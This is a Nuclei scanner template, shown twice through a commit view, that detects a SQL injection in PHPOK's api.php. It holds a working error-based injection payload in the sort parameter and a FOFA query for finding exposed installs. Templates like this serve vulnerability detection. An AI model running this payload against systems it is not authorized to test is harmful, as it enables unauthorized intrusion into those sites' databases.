nuclei-templates/vulnerabilities/other/phpok-sqli.yaml

id: phpok-sqli

info:
  name: PHPOK Sqli
  author: ritikchaddha
  severity: high
  metadata:
    verified: true
    fofa-query: app="phpok" 
  tags: phpok,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "md5({{randstr}})"
Create phpok-sqli.yaml 2022-06-05 08:31:28 +00:00			`id: phpok-sqli`

			`info:`
			`name: PHPOK Sqli`
			`author: ritikchaddha`
			`severity: high`
			`metadata:`
			`verified: true`
			`fofa-query: app="phpok"`
			`tags: phpok,sqli`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "md5({{randstr}})"`